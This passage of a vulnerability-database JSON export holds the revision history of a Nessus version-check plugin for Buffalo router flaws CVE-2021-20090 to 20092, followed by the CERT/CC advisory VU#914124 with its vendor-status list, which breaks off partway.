ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Misc.", "cpe": ["x-cpe:/a:buffalo:buffalo"], "solution": "Vendor has released fixes for certain models. Contact vendor for more information.", "nessusSeverity": "", "cvssScoreSource": "CVE-2021-20090", "vpr": {"risk factor": "Critical", "score": "9.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-04-26T00:00:00", "vulnerabilityPublicationDate": "2021-04-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-12T23:33:11", "differentElements": ["cpe", "cvss", "nessusSeverity"], "edition": 6}, {"bulletin": {"id": "BUFFALO_WSR_CVE_2021_20090.NASL", "hash": "6883eb08ae569efad38cac9cade5d51b", "type": "nessus", "bulletinFamily": "scanner", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-08-04T00:00:00", "modified": "2021-08-10T00:00:00", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152198", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.tenable.com/security/research/tra-2021-13", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20092"], "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "immutableFields": [], "lastseen": "2021-08-19T11:58:44", "history": [], "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20092", "CVE-2021-20091", "CVE-2021-20090"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}], "modified": "2021-08-19T11:58:44", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-08-19T11:58:44", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/10\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Misc.", "cpe": ["x-cpe:2.3:a:buffalo:buffalo:*:*:*:*:*:*:*:*"], "solution": "Vendor has released fixes for certain models. Contact vendor for more information.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-20090", "vpr": {"risk factor": "Critical", "score": "9.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-04-26T00:00:00", "vulnerabilityPublicationDate": "2021-04-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-08-19T11:58:44", "differentElements": ["cpe", "cvss", "vpr"], "edition": 7}, {"bulletin": {"id": "BUFFALO_WSR_CVE_2021_20090.NASL", "hash": "28b2e28bb50da5b506a61af8f26dfd82", "type": "nessus", "bulletinFamily": "scanner", "title": "Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)", "description": "Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2021-08-04T00:00:00", "modified": "2021-08-10T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/152198", "reporter": "This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20091", "https://www.tenable.com/security/research/tra-2021-13", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20092"], "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "immutableFields": [], "lastseen": "2021-09-22T23:57:20", "history": [], "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20091", "CVE-2021-20092", "CVE-2021-20090"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "attackerkb", "idList": ["AKB:41DB8118-B27F-4492-8132-F2D75D5111D4"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-09-22T23:57:20", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-09-22T23:57:20", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/10\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Misc.", "cpe": ["x-cpe:/a:buffalo:buffalo"], "solution": "Vendor has released fixes for certain models. Contact vendor for more information.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-20090", "vpr": {"risk factor": "Critical", "score": "9.6"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-04-26T00:00:00", "vulnerabilityPublicationDate": "2021-04-26T00:00:00", "exploitableWith": []}, "lastseen": "2021-09-22T23:57:20", "differentElements": ["vpr"], "edition": 8}], "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-20091", "CVE-2021-20092", "CVE-2021-20090"]}, {"type": "attackerkb", "idList": ["AKB:41DB8118-B27F-4492-8132-F2D75D5111D4"]}, {"type": "cert", "idList": ["VU:914124"]}, {"type": "seebug", "idList": ["SSV:99329"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7"]}, {"type": "thn", "idList": ["THN:EE1B4CCBFEA2E4D18964A709469ABD37"]}, {"type": "threatpost", "idList": ["THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E"]}], "modified": "2021-10-15T00:24:02", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-10-15T00:24:02", "rev": 2}}, "objectVersion": "1.6", "pluginID": "152198", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152198);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/08/10\");\n\n script_cve_id(\"CVE-2021-20090\", \"CVE-2021-20091\", \"CVE-2021-20092\");\n\n script_name(english:\"Buffalo Routers Multiple Vulnerabilities (TRA-2021-13)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Nessus was able to determine that the remote Buffalo device is affected by multiple vulnerabilities:\n \n - A path traversal vulnerability in the web interfaces of certain Buffalo router models could \n allow unauthenticated remote attackers to bypass authentication. (CVE-2021-20090)\n\n - The web interfaces of certain Buffalo router models do not properly sanitize user input. An \n authenticated remote attacker could leverage this vulnerability to alter device configuration, \n potentially gaining remote code execution. (CVE-2021-20091)\n\n - The web interfaces of certain Buffalo router models do not properly restrict access to \n sensitive information from an unauthorized actor. (CVE-2021-20092)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's \nself-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/research/tra-2021-13\");\n script_set_attribute(attribute:\"solution\", value:\n\"Vendor has released fixes for certain models. Contact vendor for more information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-20090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/a:buffalo:buffalo\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"buffalo_www_detect.nbin\");\n script_require_keys(\"installed_sw/Buffalo WWW\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('http.inc');\n\nvar port = get_http_port(default:80, embedded:TRUE);\nvar app_info = vcf::get_app_info(app:'Buffalo WWW', webapp:TRUE, port:port);\nvar constraints;\n\nif('WSR-2533DHPL2' >< app_info.model || 'WXR-5700AX7S' >< app_info.model || 'WSR-1166DHP2' >< app_info.model )\n constraints = [{'min_version' : '0', 'fixed_display' : 'No known fix' }];\nelse if('WSR-A2533DHP3' >< app_info.model) \n constraints = [{'min_version' : '0', 'fixed_version' : '1.25' }];\nelse if('WSR-3200AX4S' >< app_info.model)\n constraints = [{'min_version' : '0', 'fixed_version' : '1.20' }];\nelse\n{\n var ver_model = app_info.version;\n if (!empty_or_null(app_info.model))\n ver_model = ver_model + ' (model '+app_info.model+')';\n audit(AUDIT_INST_VER_NOT_VULN, app_info.app, ver_model);\n}\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Misc.", "cpe": ["x-cpe:/a:buffalo:buffalo"], "solution": "Vendor has released fixes for certain models. Contact vendor for more information.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2021-20090", "vpr": {"risk factor": "Critical", "score": "9.5"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2021-04-26T00:00:00", "vulnerabilityPublicationDate": "2021-04-26T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}], "cert": [{"id": "VU:914124", "hash": "531e52dc42204512afa183546e312e90", "type": "cert", "bulletinFamily": "info", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "description": "### Overview\n\nA path traversal vulnerability exists in numerous routers manufactured by multiple vendors using Arcadyan based software. This vulnerability allows an unauthenticated user access to sensitive information and allows for the alteration of the router configuration.\n\n### Description\n\nThe vulnerability, identified as [CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>), is a path traversal vulnerability. An unauthenticated attacker is able to leverage this vulnerability to access resources that would normally be protected. The researcher initially thought it was limited to one router manufacturer and published their [findings](<https://www.tenable.com/security/research/tra-2021-13>), but then discovered that the issue existed in the Arcadyan based software that was being used in routers from multiple vendors.\n\n### Impact\n\nSuccessful exploitation of this vulnerability could allow an attacker to access pages that would otherwise require authentication. An unauthenticated attacker could gain access to sensitive information, including valid request tokens, which could be used to make requests to alter router settings.\n\n### Solution\n\nThe CERT/CC recommends updating your router to the latest available firmware version. It is also recommended to disable the remote (WAN-side) administration services on any SoHo router and also disable the web interface on the WAN. \n\n### Acknowledgements\n\nThanks to the reporter Evan Grant from Tenable.\n\nThis document was written by Timur Snoke.\n\n### Vendor Information\n\n914124\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n### Buffalo Technology __ Affected\n\nNotified: 2021-07-06 Updated: 2021-08-03 **CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n\n### Deutsche Telekom __ Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Affected \n---|--- \n \n#### Vendor Statement\n\na detailed List and Product Advisory is being created, as well as fixes.\n\n### Actiontec Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ADTRAN Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AVM GmbH __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAVM does not utilize Arcadyan components.\n\n#### References\n\n * <https://en.avm.de/security/>\n\n### Brocade Communication Systems __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nNo Brocade Fibre Channel Products from Broadcom products are currently known to be affected by this vulnerability.\n\n### Check Point Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cradlepoint Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### dd-wrt Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F5 Networks Inc. Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Intel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-10-07\n\n**Statement Date: October 07, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nJuniper Networks Junos OS and Junos OS Evolved are not affected by CVE-2021-20090, CVE-2021-20091, and CVE-2021-20092.\n\n#### References\n\n * [SIR-2021-353 and PR 1613180 were created for this issue.](<SIR-2021-353 and PR 1613180 were created for this issue.>)\n\n### LANCOM Systems GmbH Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-16\n\n**Statement Date: August 16, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenWRT Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Peplink Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-11\n\n**Statement Date: August 11, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Synology Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-12\n\n**Statement Date: August 12, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Wind River __ Not Affected\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: September 06, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nVxWorks are not affect as we do not use Arcadyan-based routers and modems\n\n### Zyxel Not Affected\n\nNotified: 2021-08-10 Updated: 2021-08-18\n\n**Statement Date: August 18, 2021**\n\n**CVE-2021-20090**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### D-Link Systems Inc. __ Unknown\n\nNotified: 2021-08-10 Updated: 2021-09-06\n\n**Statement Date: August 31, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nD-Link US SIRT,\n\nAfter full investigation, D-Link has confirmed that no D-Link product are affected by this issue.\n\nRegards, security@dlink.com William Brown D-Link US SIRT\n\n#### References\n\n * [None Applicable](<None Applicable>)\n\n### A10 Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ACCESS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alcatel-Lucent Enterprise Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arcadyan Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ARRIS Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ASUSTeK Computer Inc. Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AT&amp;T Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Avaya Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Beeline Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Belkin Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### British Telecommunications Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cisco Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Comcast Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Commscope Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Extreme Networks Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### F-Secure Corporation Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi 